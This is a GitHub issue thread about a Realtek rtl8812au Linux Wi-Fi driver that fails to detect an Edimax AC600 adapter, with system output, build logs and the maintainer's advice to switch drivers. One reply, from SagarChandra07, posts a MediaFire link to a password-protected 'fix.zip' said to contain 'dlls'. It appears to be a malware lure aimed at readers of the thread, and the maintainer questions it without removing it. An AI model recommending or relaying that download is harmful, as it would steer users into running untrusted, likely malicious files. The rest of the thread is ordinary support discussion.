morrownr/8812au-20210820 #36: [Bug]: The wifi is not detected

KES777, 2024-09-29:
### Checklist

- [X] I am not using this driver from inside a Virtual Machine.
- [X] I performed all of the [installation steps](/README.md#installation-steps) as written.
- [X] I have read the [FAQ](/FAQ.md) and my question is not answered there.

### Is Secure Boot enabled?

No

### uname

Linux work 6.8.0-45-generic #45~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Sep 11 15:25:05 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

### lsusb

Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 006: ID 7392:a812 Edimax Technology Co., Ltd Edimax AC600 USB Bus 001 Device 010: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 009: ID 0c45:62f1 Microdia USB 2.0 Camera Bus 001 Device 008: ID 09da:9090 A4Tech Co., Ltd. XL-730K / XL-750BK / XL-755BK Mice Bus 001 Device 007: ID 09da:2268 A4Tech Co., Ltd. USB Keyboard Bus 001 Device 005: ID 1a40:0101 Terminus Technology Inc. Hub Bus 001 Device 004: ID 05e3:0608 Genesys Logic, Inc. Hub Bus 001 Device 003: ID 0b05:19af ASUSTek Computer, Inc. AURA LED Controller Bus 001 Device 002: ID 046d:0aee Logitech, Inc. Zone Vibe 125 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

### rfkill

None

### dkms

```text
rtl8812au/5.13.6-23, 6.8.0-45-generic, x86_64: installed
```

### iw

```text
none
```

### git status

```text
$ git status
On branch main
Your branch is up to date with 'origin/main'.

Untracked files:
  (use "git add <file>..." to include in what will be committed)
	.8812au.ko.cmd
	.8812au.mod.cmd
	.8812au.mod.o.cmd
	.8812au.o.cmd
	.Module.symvers.cmd
	.modules.order.cmd
	8812au.ko
	8812au.mod
	8812au.mod.c
	8812au.mod.o
	8812au.o
	Module.symvers
	core/.rtw_ap.o.cmd
	core/.rtw_beamforming.o.cmd
	core/.rtw_br_ext.o.cmd
	core/.rtw_btcoex.o.cmd
	core/.rtw_btcoex_wifionly.o.cmd
	core/.rtw_chplan.o.cmd
	core/.rtw_cmd.o.cmd
	core/.rtw_debug.o.cmd
	core/.rtw_ft.o.cmd
	core/.rtw_ieee80211.o.cmd
	core/.rtw_io.o.cmd
	core/.rtw_ioctl_query.o.cmd
	core/.rtw_ioctl_set.o.cmd
	core/.rtw_iol.o.cmd
	core/.rtw_mbo.o.cmd
[... 397 lines cut ...]

Kernel preparation unnecessary for this kernel. Skipping...

Building module:
cleaning build area...
'make' all KVER=6.8.0-45-generic...............
cleaning build area...
dkms install -m 8812au -v 4.2.3

8812au.ko:
Running module version sanity check.
 - Original module
   - No original module exists within this kernel
 - Installation
   - Installing to /lib/modules/6.8.0-45-generic/updates/dkms/

depmod...
dkms status
8812au/4.2.3, 6.8.0-45-generic, x86_64: installed
kes@work ~/INST/driver/rtl8812ua_2 $ sudo modprobe 8812au
kes@work ~/INST/driver/rtl8812ua_2 $ git remote -v
origin	https://github.com/gnab/rtl8812au.git (fetch)
origin	https://github.com/gnab/rtl8812au.git (push)

```

SagarChandra07, 2024-09-29:
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
I put the necessary dlls in the archive

morrownr, 2024-09-29:
Hi @KES777 

>  ID 7392:a812 Edimax Technology Co., Ltd Edimax AC600

You are using the wrong driver. Remove this driver and head over the correct driver:

https://github.com/morrownr/8821au-20210708

@SagarChandra07 

What are you talking about?

KES777, 2024-09-29:
@morrownr I always used this driver before:
https://github.com/gnab/rtl8812au.git

Now I am able to connect to WiFi, but it does not work with 5G =(
Details are here: https://github.com/morrownr/8821au-20210708/issues/154#issue-2555008351

closed 2024-09-29 by KES777

morrownr, 2024-09-29:
> I always used this driver before:...

At one time, the rtl8812au and rtl8821au drivers were in the same rtl8812au package but Realtek decided to separate them several years ago. That old driver you were using was based on really old source code.

The most modern version of this out-of-kernel driver is the one right here in this repo.

FYI: A standards compliance rtl8812au driver is under review by kernel devs right now and should go into the Linux kernel at some point in the next few months. Then we can throw this and some other out-of-kernel drivers in the bit bucket.